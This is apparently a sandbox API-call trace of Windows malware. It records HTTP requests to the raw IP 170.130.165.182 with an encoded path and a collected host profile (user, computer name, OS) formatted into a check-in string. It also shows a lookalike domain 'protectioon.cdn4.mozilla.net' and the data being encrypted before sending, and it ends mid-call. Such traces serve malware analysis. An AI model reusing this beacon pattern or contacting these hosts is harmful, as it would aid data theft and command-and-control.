[0129.725] lstrlenA (lpString="170.130.165.182/fonts/YxWT4AU8gIKfD5nz82G_2Bx/Gf1XohqLXX/TWvPpHPW4oiV4l5NF/A_2FgmLjWqqI/s_2BPi8ekE0/Y4S97WsDdTOeV2/p4zvOgzHm6siGK93bMPU8/9A6RC2OOTYn80Zr1/Kd7DwOd7WP2abaq/bN5ftwkxFJv6RepbW9/9_2FV6hXW/sPu6sFm_2FBMiXZZhpE2/YvFQZ_2FXlvo0Ib7_2F/98OHY3kqREKLzdTlXTYbk_/2BuJAfTyqQy_2/F9TvlrYK/jP6X5ZM7HYulxceF1JwCYQZ/EQ0AjezZSs/4QJXSsnHSvkWadq0X/Le5kL4HSw_2F5qPv_/2FssgT.bak") returned 367 [0129.725] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x170) returned 0x2c5fbb8 [0129.725] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x170) returned 0x2c5fd30 [0129.725] StrChrA (lpStart="170.130.165.182/fonts/YxWT4AU8gIKfD5nz82G_2Bx/Gf1XohqLXX/TWvPpHPW4oiV4l5NF/A_2FgmLjWqqI/s_2BPi8ekE0/Y4S97WsDdTOeV2/p4zvOgzHm6siGK93bMPU8/9A6RC2OOTYn80Zr1/Kd7DwOd7WP2abaq/bN5ftwkxFJv6RepbW9/9_2FV6hXW/sPu6sFm_2FBMiXZZhpE2/YvFQZ_2FXlvo0Ib7_2F/98OHY3kqREKLzdTlXTYbk_/2BuJAfTyqQy_2/F9TvlrYK/jP6X5ZM7HYulxceF1JwCYQZ/EQ0AjezZSs/4QJXSsnHSvkWadq0X/Le5kL4HSw_2F5qPv_/2FssgT.bak", wMatch=0x2f) returned="/fonts/YxWT4AU8gIKfD5nz82G_2Bx/Gf1XohqLXX/TWvPpHPW4oiV4l5NF/A_2FgmLjWqqI/s_2BPi8ekE0/Y4S97WsDdTOeV2/p4zvOgzHm6siGK93bMPU8/9A6RC2OOTYn80Zr1/Kd7DwOd7WP2abaq/bN5ftwkxFJv6RepbW9/9_2FV6hXW/sPu6sFm_2FBMiXZZhpE2/YvFQZ_2FXlvo0Ib7_2F/98OHY3kqREKLzdTlXTYbk_/2BuJAfTyqQy_2/F9TvlrYK/jP6X5ZM7HYulxceF1JwCYQZ/EQ0AjezZSs/4QJXSsnHSvkWadq0X/Le5kL4HSw_2F5qPv_/2FssgT.bak" [0129.725] StrChrA (lpStart="170.130.165.182/fonts/YxWT4AU8gIKfD5nz82G_2Bx/Gf1XohqLXX/TWvPpHPW4oiV4l5NF/A_2FgmLjWqqI/s_2BPi8ekE0/Y4S97WsDdTOeV2/p4zvOgzHm6siGK93bMPU8/9A6RC2OOTYn80Zr1/Kd7DwOd7WP2abaq/bN5ftwkxFJv6RepbW9/9_2FV6hXW/sPu6sFm_2FBMiXZZhpE2/YvFQZ_2FXlvo0Ib7_2F/98OHY3kqREKLzdTlXTYbk_/2BuJAfTyqQy_2/F9TvlrYK/jP6X5ZM7HYulxceF1JwCYQZ/EQ0AjezZSs/4QJXSsnHSvkWadq0X/Le5kL4HSw_2F5qPv_/2FssgT.bak", wMatch=0x3f) returned 0x0 [0129.725] memcpy (in: _Dst=0x2c5fbb8, _Src=0x2c5f238, _Size=0xf | out: _Dst=0x2c5fbb8) returned 0x2c5fbb8 [0129.725] lstrcpyA (in: lpString1=0x2c5fd30, lpString2="/fonts/YxWT4AU8gIKfD5nz82G_2Bx/Gf1XohqLXX/TWvPpHPW4oiV4l5NF/A_2FgmLjWqqI/s_2BPi8ekE0/Y4S97WsDdTOeV2/p4zvOgzHm6siGK93bMPU8/9A6RC2OOTYn80Zr1/Kd7DwOd7WP2abaq/bN5ftwkxFJv6RepbW9/9_2FV6hXW/sPu6sFm_2FBMiXZZhpE2/YvFQZ_2FXlvo0Ib7_2F/98OHY3kqREKLzdTlXTYbk_/2BuJAfTyqQy_2/F9TvlrYK/jP6X5ZM7HYulxceF1JwCYQZ/EQ0AjezZSs/4QJXSsnHSvkWadq0X/Le5kL4HSw_2F5qPv_/2FssgT.bak" | out: lpString1="/fonts/YxWT4AU8gIKfD5nz82G_2Bx/Gf1XohqLXX/TWvPpHPW4oiV4l5NF/A_2FgmLjWqqI/s_2BPi8ekE0/Y4S97WsDdTOeV2/p4zvOgzHm6siGK93bMPU8/9A6RC2OOTYn80Zr1/Kd7DwOd7WP2abaq/bN5ftwkxFJv6RepbW9/9_2FV6hXW/sPu6sFm_2FBMiXZZhpE2/YvFQZ_2FXlvo0Ib7_2F/98OHY3kqREKLzdTlXTYbk_/2BuJAfTyqQy_2/F9TvlrYK/jP6X5ZM7HYulxceF1JwCYQZ/EQ0AjezZSs/4QJXSsnHSvkWadq0X/Le5kL4HSw_2F5qPv_/2FssgT.bak") returned="/fonts/YxWT4AU8gIKfD5nz82G_2Bx/Gf1XohqLXX/TWvPpHPW4oiV4l5NF/A_2FgmLjWqqI/s_2BPi8ekE0/Y4S97WsDdTOeV2/p4zvOgzHm6siGK93bMPU8/9A6RC2OOTYn80Zr1/Kd7DwOd7WP2abaq/bN5ftwkxFJv6RepbW9/9_2FV6hXW/sPu6sFm_2FBMiXZZhpE2/YvFQZ_2FXlvo0Ib7_2F/98OHY3kqREKLzdTlXTYbk_/2BuJAfTyqQy_2/F9TvlrYK/jP6X5ZM7HYulxceF1JwCYQZ/EQ0AjezZSs/4QJXSsnHSvkWadq0X/Le5kL4HSw_2F5qPv_/2FssgT.bak" [0129.725] lstrlenA (lpString="/fonts/YxWT4AU8gIKfD5nz82G_2Bx/Gf1XohqLXX/TWvPpHPW4oiV4l5NF/A_2FgmLjWqqI/s_2BPi8ekE0/Y4S97WsDdTOeV2/p4zvOgzHm6siGK93bMPU8/9A6RC2OOTYn80Zr1/Kd7DwOd7WP2abaq/bN5ftwkxFJv6RepbW9/9_2FV6hXW/sPu6sFm_2FBMiXZZhpE2/YvFQZ_2FXlvo0Ib7_2F/98OHY3kqREKLzdTlXTYbk_/2BuJAfTyqQy_2/F9TvlrYK/jP6X5ZM7HYulxceF1JwCYQZ/EQ0AjezZSs/4QJXSsnHSvkWadq0X/Le5kL4HSw_2F5qPv_/2FssgT.bak") returned 352 [0129.725] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x2c1) returned 0x2be00d8 [0129.725] InternetCanonicalizeUrlA (lpszUrl="/fonts/YxWT4AU8gIKfD5nz82G_2Bx/Gf1XohqLXX/TWvPpHPW4oiV4l5NF/A_2FgmLjWqqI/s_2BPi8ekE0/Y4S97WsDdTOeV2/p4zvOgzHm6siGK93bMPU8/9A6RC2OOTYn80Zr1/Kd7DwOd7WP2abaq/bN5ftwkxFJv6RepbW9/9_2FV6hXW/sPu6sFm_2FBMiXZZhpE2/YvFQZ_2FXlvo0Ib7_2F/98OHY3kqREKLzdTlXTYbk_/2BuJAfTyqQy_2/F9TvlrYK/jP6X5ZM7HYulxceF1JwCYQZ/EQ0AjezZSs/4QJXSsnHSvkWadq0X/Le5kL4HSw_2F5qPv_/2FssgT.bak", lpszBuffer=0x2be00d8, lpdwBufferLength=0x11ff040, dwFlags=0x0) [0129.725] InternetCanonicalizeUrlA (in: lpszUrl="/fonts/YxWT4AU8gIKfD5nz82G_2Bx/Gf1XohqLXX/TWvPpHPW4oiV4l5NF/A_2FgmLjWqqI/s_2BPi8ekE0/Y4S97WsDdTOeV2/p4zvOgzHm6siGK93bMPU8/9A6RC2OOTYn80Zr1/Kd7DwOd7WP2abaq/bN5ftwkxFJv6RepbW9/9_2FV6hXW/sPu6sFm_2FBMiXZZhpE2/YvFQZ_2FXlvo0Ib7_2F/98OHY3kqREKLzdTlXTYbk_/2BuJAfTyqQy_2/F9TvlrYK/jP6X5ZM7HYulxceF1JwCYQZ/EQ0AjezZSs/4QJXSsnHSvkWadq0X/Le5kL4HSw_2F5qPv_/2FssgT.bak", lpszBuffer=0x2be00d8, lpdwBufferLength=0x11ff040, dwFlags=0x0 | out: lpszBuffer="/fonts/YxWT4AU8gIKfD5nz82G_2Bx/Gf1XohqLXX/TWvPpHPW4oiV4l5NF/A_2FgmLjWqqI/s_2BPi8ekE0/Y4S97WsDdTOeV2/p4zvOgzHm6siGK93bMPU8/9A6RC2OOTYn80Zr1/Kd7DwOd7WP2abaq/bN5ftwkxFJv6RepbW9/9_2FV6hXW/sPu6sFm_2FBMiXZZhpE2/YvFQZ_2FXlvo0Ib7_2F/98OHY3kqREKLzdTlXTYbk_/2BuJAfTyqQy_2/F9TvlrYK/jP6X5ZM7HYulxceF1JwCYQZ/EQ0AjezZSs/4QJXSsnHSvkWadq0X/Le5kL4HSw_2F5qPv_/2FssgT.bak", lpdwBufferLength=0x11ff040) returned 1 [0129.726] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5fd30 | out: hHeap=0x2860000) returned 1 [0129.726] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x10000000) [0129.726] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x10000000) returned 0xcc0004 [0129.727] InternetSetStatusCallbackA (hInternet=0xcc0004, lpfnInternetCallback=0x2f7bbd) returned 0x0 [0129.727] ResetEvent (hEvent=0x38c) returned 1 [0129.727] InternetConnectA (hInternet=0xcc0004, lpszServerName="170.130.165.182", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x11ff074) [0129.727] InternetConnectA (hInternet=0xcc0004, lpszServerName="170.130.165.182", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x11ff074) returned 0xcc0008 [0129.728] SetEvent (hEvent=0x38c) returned 1 [0129.728] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/fonts/YxWT4AU8gIKfD5nz82G_2Bx/Gf1XohqLXX/TWvPpHPW4oiV4l5NF/A_2FgmLjWqqI/s_2BPi8ekE0/Y4S97WsDdTOeV2/p4zvOgzHm6siGK93bMPU8/9A6RC2OOTYn80Zr1/Kd7DwOd7WP2abaq/bN5ftwkxFJv6RepbW9/9_2FV6hXW/sPu6sFm_2FBMiXZZhpE2/YvFQZ_2FXlvo0Ib7_2F/98OHY3kqREKLzdTlXTYbk_/2BuJAfTyqQy_2/F9TvlrYK/jP6X5ZM7HYulxceF1JwCYQZ/EQ0AjezZSs/4QJXSsnHSvkWadq0X/Le5kL4HSw_2F5qPv_/2FssgT.bak", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84404000, dwContext=0x11ff074) returned 0xcc000c [0129.728] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x11ff044, lpdwBufferLength=0x11ff040 | out: lpBuffer=0x11ff044, lpdwBufferLength=0x11ff040) returned 1 [0129.728] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x11ff044*, dwBufferLength=0x4) returned 1 [0129.728] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x6, lpBuffer=0x11ff03c*, dwBufferLength=0x4) returned 1 [0129.728] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x5, lpBuffer=0x11ff03c*, dwBufferLength=0x4) returned 1 [0129.728] ResetEvent (hEvent=0x38c) returned 1 [0129.728] ResetEvent (hEvent=0x1c8) returned 1 [0129.728] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0) [0129.728] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0) returned 0 [0129.729] GetLastError () returned 0x3e5 [0129.729] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x0) returned 0x102 [0129.729] HttpQueryInfoA (hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x11ff0a0, lpdwBufferLength=0x11ff054, lpdwIndex=0x11ff04c*=0x0) [0129.729] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x11ff0a0, lpdwBufferLength=0x11ff054, lpdwIndex=0x11ff04c*=0x0 | out: lpBuffer=0x11ff0a0*, lpdwBufferLength=0x11ff054*=0x4, lpdwIndex=0x11ff04c*=0x0) returned 1 [0129.729] WaitForMultipleObjects (nCount=0x2, lpHandles=0x11ff02c*=0x38c, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0130.286] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x0) returned 0x0 [0130.286] SetEvent (hEvent=0x38c) returned 1 [0130.286] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x11ff0a0, lpdwBufferLength=0x11ff054, lpdwIndex=0x11ff04c*=0x0 | out: lpBuffer=0x11ff0a0*, lpdwBufferLength=0x11ff054*=0x4, lpdwIndex=0x11ff04c*=0x0) returned 1 [0130.286] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x16, lpBuffer=0x0, lpdwBufferLength=0x11ff054, lpdwIndex=0x11ff04c*=0x0 | out: lpBuffer=0x0, lpdwBufferLength=0x11ff054, lpdwIndex=0x11ff04c*=0x0) returned 0 [0130.286] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0xcc) returned 0x2c59c90 [0130.286] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x16, lpBuffer=0x2c59c90, lpdwBufferLength=0x11ff054, lpdwIndex=0x11ff04c*=0x0 | out: lpBuffer=0x2c59c90*, lpdwBufferLength=0x11ff054*=0xca, lpdwIndex=0x11ff04c*=0x0) returned 1 [0130.286] ResetEvent (hEvent=0x38c) returned 1 [0130.286] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x11ff050, dwNumberOfBytesToRead=0x4, lpdwNumberOfBytesRead=0x11ff05c | out: lpBuffer=0x11ff050*, lpdwNumberOfBytesRead=0x11ff05c*=0x4) returned 1 [0130.286] CreateStreamOnHGlobal (hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x11ff058) [0130.286] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x11ff058 | out: ppstm=0x11ff058*=0x7ba3c8) returned 0x0 [0130.287] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x1000) returned 0x2be03a8 [0130.287] ISequentialStream:RemoteWrite (in: This=0x7ba3c8, pv=0x11ff050*=0x3c, cb=0x4, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0130.287] ResetEvent (hEvent=0x38c) returned 1 [0130.288] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2be03a8, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x11ff05c | out: lpBuffer=0x2be03a8*, lpdwNumberOfBytesRead=0x11ff05c*=0x220) returned 1 [0130.288] ISequentialStream:RemoteWrite (in: This=0x7ba3c8, pv=0x2be03a8*=0x6c, cb=0x220, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0130.288] ResetEvent (hEvent=0x38c) returned 1 [0130.288] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2be03a8, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x11ff05c | out: lpBuffer=0x2be03a8*, lpdwNumberOfBytesRead=0x11ff05c*=0x0) returned 1 [0130.289] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2be03a8 | out: hHeap=0x2860000) returned 1 [0130.289] IStream:Stat (This=0x7ba3c8, pstatstg=0x11fefe0, grfStatFlag=0x1) [0130.289] IStream:Stat (in: This=0x7ba3c8, pstatstg=0x11fefe0, grfStatFlag=0x1 | out: pstatstg=0x11fefe0) returned 0x0 [0130.289] IStream:RemoteSeek (in: This=0x7ba3c8, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0130.289] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x225) returned 0x2c5fd30 [0130.289] ISequentialStream:RemoteRead (in: This=0x7ba3c8, pv=0x2c5fd30, cb=0x224, pcbRead=0x11ff03c | out: pv=0x2c5fd30*=0x3c, pcbRead=0x11ff03c*=0x224) returned 0x0 [0130.289] IUnknown:Release (This=0x7ba3c8) returned 0x0 [0130.289] WaitForMultipleObjects (nCount=0x2, lpHandles=0x11ff048*=0x1c8, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0130.289] InternetSetStatusCallbackA (hInternet=0xcc000c, lpfnInternetCallback=0x0) returned 0x2f7bbd [0130.289] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0130.290] InternetSetStatusCallbackA (hInternet=0xcc0008, lpfnInternetCallback=0x0) returned 0x2f7bbd [0130.290] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0130.290] InternetSetStatusCallbackA (hInternet=0xcc0004, lpfnInternetCallback=0x0) returned 0x2f7bbd [0130.290] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0130.290] CloseHandle (hObject=0x38c) returned 1 [0130.290] CloseHandle (hObject=0x1c8) returned 1 [0130.290] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5fd30 | out: hHeap=0x2860000) returned 1 [0130.291] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59c90 | out: hHeap=0x2860000) returned 1 [0130.292] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5fbb8 | out: hHeap=0x2860000) returned 1 [0130.292] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2be00d8 | out: hHeap=0x2860000) returned 1 [0130.293] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b28 | out: hHeap=0x2860000) returned 1 [0130.293] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5fa40 | out: hHeap=0x2860000) returned 1 [0130.294] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5f238 | out: hHeap=0x2860000) returned 1 [0130.294] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5ea50 | out: hHeap=0x2860000) returned 1 [0130.295] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5a510 | out: hHeap=0x2860000) returned 1 [0130.295] SetWaitableTimer (hTimer=0x13c, lpDueTime=0x11ff168, lPeriod=0, pfnCompletionRoutine=0x0, lpArgToCompletionRoutine=0x0, fResume=0) [0130.295] SetWaitableTimer (hTimer=0x13c, lpDueTime=0x11ff168, lPeriod=0, pfnCompletionRoutine=0x0, lpArgToCompletionRoutine=0x0, fResume=0) returned 1 [0130.295] WaitForMultipleObjects (nCount=0x2, lpHandles=0x11ff170*=0x13c, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0140.311] wsprintfA (param_1=0x11ff104, param_2="size=%u&hash=0x%08x") [0140.311] wsprintfA (in: param_1=0x11ff104, param_2="size=%u&hash=0x%08x" | out: param_1="size=0&hash=0x00000000") returned 22 [0140.312] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x800) returned 0x2c5a510 [0140.312] wsprintfA (in: param_1=0x2c5a510, param_2="soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x" | out: param_1="soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1") returned 84 [0140.312] QueryPerformanceFrequency (in: lpFrequency=0x11ff0b8 | out: lpFrequency=0x11ff0b8*=100000000) returned 1 [0140.312] QueryPerformanceCounter (lpPerformanceCount=0x11ff0b0) [0140.312] QueryPerformanceCounter (in: lpPerformanceCount=0x11ff0b0 | out: lpPerformanceCount=0x11ff0b0*=2817564705867) returned 1 [0140.313] wsprintfA (in: param_1=0x2c5a564, param_2="&uptime=%u" | out: param_1="&uptime=28175") returned 13 [0140.313] wsprintfA (in: param_1=0x2c5a571, param_2="&%s" | out: param_1="&size=0&hash=0x00000000") returned 23 [0140.313] wsprintfA (in: param_1=0x2c5a588, param_2="&action=%08x" | out: param_1="&action=00000000") returned 16 [0140.313] GetComputerNameExA (NameType=0x3, lpBuffer=0x0, nSize=0x11ff0bc) [0140.313] GetComputerNameExA (in: NameType=0x3, lpBuffer=0x0, nSize=0x11ff0bc | out: lpBuffer=0x0, nSize=0x11ff0bc) returned 0 [0140.316] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0xc) returned 0x2c5ea50 [0140.316] GetComputerNameExA (in: NameType=0x3, lpBuffer=0x2c5ea50, nSize=0x11ff0bc | out: lpBuffer="Q9iATrkPrH", nSize=0x11ff0bc) returned 1 [0140.316] wsprintfA (in: param_1=0x2c5a598, param_2="&dns=%s" | out: param_1="&dns=Q9iATrkPrH") returned 15 [0140.316] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5ea50 | out: hHeap=0x2860000) returned 1 [0140.317] GetUserNameW (lpBuffer=0x0, pcbBuffer=0x11ff0bc) [0140.317] GetUserNameW (in: lpBuffer=0x0, pcbBuffer=0x11ff0bc | out: lpBuffer=0x0, pcbBuffer=0x11ff0bc) returned 0 [0140.319] GetComputerNameW (lpBuffer=0x0, nSize=0x11ff0bc) [0140.319] GetComputerNameW (in: lpBuffer=0x0, nSize=0x11ff0bc | out: lpBuffer=0x0, nSize=0x11ff0bc) returned 0 [0140.319] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x5c) returned 0x2c59b28 [0140.319] GetUserNameW (in: lpBuffer=0x2c59b56, pcbBuffer=0x11ff0bc | out: lpBuffer="kEecfMwgj", pcbBuffer=0x11ff0bc) returned 1 [0140.319] GetComputerNameW (in: lpBuffer=0x2c59b6a, nSize=0x11ff0b8 | out: lpBuffer="Q9IATRKPRH", nSize=0x11ff0b8) returned 1 [0140.319] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kEecfMwgj@Q9IATRKPRH", cchWideChar=20, lpMultiByteStr=0x2c59b28, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kEecfMwgj@Q9IATRKPRH5nz82G_2Bx/Gf1XohqLXX/TWvPk", lpUsedDefaultChar=0x0) returned 20 [0140.319] wsprintfA (in: param_1=0x2c5a5a7, param_2="&whoami=%s" | out: param_1="&whoami=kEecfMwgj@Q9IATRKPRH") returned 28 [0140.320] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b28 | out: hHeap=0x2860000) returned 1 [0140.322] lstrlenA (lpString="protectioon.cdn4.mozilla.net") [0140.322] lstrlenA (lpString="protectioon.cdn4.mozilla.net") returned 28 [0140.322] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x1d) returned 0x2c59a68 [0140.322] memcpy (in: _Dst=0x2c59a68, _Src=0x2c59eac, _Size=0x1c | out: _Dst=0x2c59a68) returned 0x2c59a68 [0140.322] wsprintfA (in: param_1=0x2c5a5c3, param_2="&os=%s" | out: param_1="&os=6.1_1_7601_x64") returned 18 [0140.322] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x800) returned 0x2c5f238 [0140.322] GetTickCount () [0140.322] GetTickCount () returned 0x1aaf645 [0140.322] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x4) returned 0x2c59b28 [0140.322] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x6) returned 0x2c59b38 [0140.322] lstrlenA (lpString="%s=%s&") returned 6 [0140.322] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0xf) returned 0x2c5ea50 [0140.322] sprintf (_Dest=0x2c5ea50, _Format="%s=%s&") [0140.322] sprintf (in: _Dest=0x2c5ea50, _Format="%s=%s&" | out: _Dest="mvfvj=mtq&") returned 10 [0140.322] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b38 | out: hHeap=0x2860000) returned 1 [0140.322] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b28 | out: hHeap=0x2860000) returned 1 [0140.322] lstrlenA (lpString="mvfvj=mtq&") returned 10 [0140.322] lstrlenA (lpString="soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=28175&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64") returned 197 [0140.322] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0xd0) returned 0x2c59b28 [0140.322] strcpy (_Dest=0x2c59b28, _Source="mvfvj=mtq&") [0140.322] strcpy (in: _Dest=0x2c59b28, _Source="mvfvj=mtq&" | out: _Dest="mvfvj=mtq&") returned="mvfvj=mtq&" [0140.323] lstrcatA (lpString1="mvfvj=mtq&", lpString2="soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=28175&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64") [0140.323] lstrcatA (in: lpString1="mvfvj=mtq&", lpString2="soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=28175&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64" | out: lpString1="mvfvj=mtq&soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=28175&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64") returned="mvfvj=mtq&soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=28175&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64" [0140.323] lstrlenA (lpString="mvfvj=mtq&soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=28175&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64") returned 207 [0140.323] CryptAcquireContextW (phProv=0x11ff064, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) [0140.323] CryptAcquireContextW (in: phProv=0x11ff064, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x11ff064*=0x7917d8) returned 1 [0140.325] memcpy (in: _Dst=0x11ff044, _Src=0x2c59df8, _Size=0x10 | out: _Dst=0x11ff044) returned 0x11ff044 [0140.325] CryptImportKey (hProv=0x7917d8, pbData=0x11ff038*, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x0, phKey=0x11ff070) [0140.325] CryptImportKey (in: hProv=0x7917d8, pbData=0x11ff038*, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x0, phKey=0x11ff070 | out: phKey=0x11ff070*=0x77d378) returned 1 [0140.325] CryptSetKeyParam (hKey=0x77d378, dwParam=0x1, pbData=0x11ff054, dwFlags=0x0) [0140.325] CryptSetKeyParam (hKey=0x77d378, dwParam=0x1, pbData=0x11ff054, dwFlags=0x0) returned 1 [0140.325] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0xe0) returned 0x2c59c00 [0140.325] memcpy (in: _Dst=0x2c59c00, _Src=0x2c59b28, _Size=0x10 | out: _Dst=0x2c59c00) returned 0x2c59c00 [0140.325] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c00*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c00*, pdwDataLen=0x11ff074*=0x10) returned 1 [0140.325] memcpy (in: _Dst=0x2c59c10, _Src=0x2c59b38, _Size=0x10 | out: _Dst=0x2c59c10) returned 0x2c59c10 [0140.325] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c10*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c10*, pdwDataLen=0x11ff074*=0x10) returned 1 [0140.325] memcpy (in: _Dst=0x2c59c20, _Src=0x2c59b48, _Size=0x10 | out: _Dst=0x2c59c20) returned 0x2c59c20 [0140.325] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c20*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c20*, pdwDataLen=0x11ff074*=0x10) returned 1 [0140.325] memcpy (in: _Dst=0x2c59c30, _Src=0x2c59b58, _Size=0x10 | out: _Dst=0x2c59c30) returned 0x2c59c30 [0140.325] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c30*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c30*, pdwDataLen=0x11ff074*=0x10) returned 1 [0140.326] memcpy (in: _Dst=0x2c59c40, _Src=0x2c59b68, _Size=0x10 | out: _Dst=0x2c59c40) returned 0x2c59c40 [0140.326] CryptEncrypt (in: hKey=0x77d378, 